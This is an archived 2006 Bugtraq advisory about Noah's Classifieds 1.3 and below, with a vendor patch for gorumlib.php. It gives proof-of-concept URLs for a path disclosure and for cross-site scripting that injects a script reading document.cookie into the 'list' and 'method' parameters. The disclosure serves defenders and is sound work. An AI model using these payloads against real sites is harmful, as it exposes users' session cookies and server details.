lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 20 Mar 2006 13:50:07 -0000
From: raphael.huck@...e.fr
To: bugtraq@...urityfocus.com
Subject: Noah's Classifieds Multiple Path Disclosure and Cross Site
 Scripting Vulnerabilities


I have contacted PhpOutsourcing 2 weeks ago, and they didn't answer.

The mail I sent on classifieds AT phpoutsourcing DOT com bounced back in error. The one I sent on askme AT phpoutsourcing DOT com never got replied.

"Currently, we are completely overloaded with our running projects, and we don't have enough time to deal with our free products. The further development and support of Noah's Classifieds is therefore suspended. Thank you for the understanding and please forgive us that we don't responding to the emails."

Anyway, they clearly mention that they have stopped the support, but there are unpatched vulnerabilities in their product.


Vendor: PhpOutsourcing

Vulnerable: Noah's Classified 1.3 and below

Path Disclosure

http://www.example.com/classifieds/index.php?method=showdetails&list=dummy

which returns:

Fatal error: Cannot instantiate non-existent class: dummy in /path/classifieds/gorum/gorumlib.php on line 45

Cross Site Scripting

http://www.example.com/classifieds/index.php?method=showdetails&list=%3Cscript%3Ealert(document.cookie)%3C/script%3Eadvertisement&rollid=1
http://www.example.com/classifieds/index.php?method=%3Cscript%3Ealert(document.cookie)%3B%3C/script%3E

Solution

The vendor is not supporting this product at the moment: "Currently, we are completely overloaded with our running projects, and we don't have enough time to deal with our free products. The further development and support of Noah's Classifieds is therefore suspended. Thank you for the understanding and please forgive us that we don't responding to the emails."

To solve this vulnerabilities, in gorum/gorumlib.php:

Line 45, add before $base = new gorumroll->class;:

	if (!class_exists($gorumroll->class)) {
		$txt="Class does not exist:".preg_replace("/[^a-z]/","",substr($gorumroll->class,0,32));
		handleError($txt);
	}

and, at line 124, replace:

	$txt="Method is not allowed: $gorumroll->method";

by:

	$txt="Method is not allowed:".preg_replace("/[^a-z]/","",substr($gorumroll->method,0,32));


http://zone14.free.fr/advisories/1/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ